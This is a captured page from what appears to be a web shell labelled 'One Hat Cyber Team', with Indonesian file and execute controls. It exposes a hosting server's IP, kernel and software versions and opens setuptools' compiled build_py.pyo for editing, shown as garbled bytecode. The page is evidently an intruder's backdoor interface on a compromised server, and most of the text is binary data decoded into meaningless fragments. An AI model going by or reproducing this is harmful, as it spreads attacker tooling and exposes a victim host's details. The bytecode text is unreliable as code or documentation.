⚝
One Hat Cyber Team
⚝
Your IP:
216.73.217.31
Server IP:
95.217.99.93
Server:
Linux sv1.sonichosted.com 4.18.0-553.34.1.lve.el8.x86_64 #1 SMP Thu Jan 9 16:30:32 UTC 2025 x86_64
Server Software:
LiteSpeed
PHP Version:
8.2.29
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
lib
/
python2.7
/
site-packages
/
setuptools
/
command
/
Edit File: build_py.pyo
ó Àfc @ s d d l m Z d d l m Z d d l j j Z d d l Z d d l Z d d l Z d d l Z d d l Z d d l Z d d l m Z d d l m Z m Z m Z y d d l m Z Wn$ e k rà d d d „ ƒ YZ n Xd e j e f d „ ƒ YZ d d „ Z d „ Z d S( iÿÿÿÿ( t glob( t convert_pathN( t six( t mapt filtert filterfalse( t Mixin2to3R c B s e Z e d „ Z RS( c C s d S( s do nothingN( ( t selft filest doctests( ( s? /usr/lib/python2.7/site-packages/setuptools/command/build_py.pyt run_2to3 t ( t __name__t __module__t TrueR ( ( ( s? /usr/lib/python2.7/site-packages/setuptools/command/build_py.pyR s t build_pyc B s› e Z d Z d „ Z d „ Z d „ Z d „ Z d „ Z d „ Z d „ Z d „ Z d „ Z d „ Z d „ Z d „ Z d „ Z d „ Z e d „ ƒ Z RS( sX Enhanced 'build_py' command that includes data files with packages The data files are specified via a 'package_data' argument to 'setup()'. See 'setuptools.dist.Distribution' for more details. Also, this version of the 'build_py' command allows you to specify both 'py_modules' and 'packages' in the same setup operation. c C sf t j j | ƒ | j j | _ | j j p. i | _ d | j k rP | j d =n g | _ g | _ d S( Nt data_files( t origR t finalize_optionst distributiont package_datat exclude_package_datat __dict__t _build_py__updated_filest _build_py__doctests_2to3( R ( ( s? /usr/lib/python2.7/site-packages/setuptools/command/build_py.pyR ! s c C sª | j r | j r d S| j r. | j ƒ n | j rN | j ƒ | j ƒ n | j | j t ƒ | j | j t ƒ | j | j t ƒ | j t j j | d d ƒƒ d S( s? Build modules, packages, and copy data files to build directoryNt include_bytecodei ( t py_modulest packagest build_modulest build_packagest build_package_dataR R t FalseR R t byte_compileR R t get_outputs( R ( ( s? /usr/lib/python2.7/site-packages/setuptools/command/build_py.pyt run+ s c C s5 | d k r" | j ƒ | _ | j St j j | | ƒ S( s lazily compute data filesR ( t _get_data_filesR R R t __getattr__( R t attr( ( s? /usr/lib/python2.7/site-packages/setuptools/command/build_py.pyR$ ? s c C sq t j r- t | t j ƒ r- | j d ƒ } n t j j | | | | ƒ \ } } | rg | j j | ƒ n | | f S( Nt .( R t PY2t isinstancet string_typest splitR R t build_moduleR t append( R t modulet module_filet packaget outfilet copied( ( s? /usr/lib/python2.7/site-packages/setuptools/command/build_py.pyR+ F s c C s) | j ƒ t t | j | j p" d ƒ ƒ S( s? Generate list of '(package,src_dir,build_dir,filenames)' tuples( ( t analyze_manifestt listR t _get_pkg_data_filesR ( R ( ( s? /usr/lib/python2.7/site-packages/setuptools/command/build_py.pyR# P s c C sx | j | ƒ } t j j | j g | j d ƒ Œ } g | j | | ƒ D] } t j j | | ƒ ^ qG } | | | | f S( NR&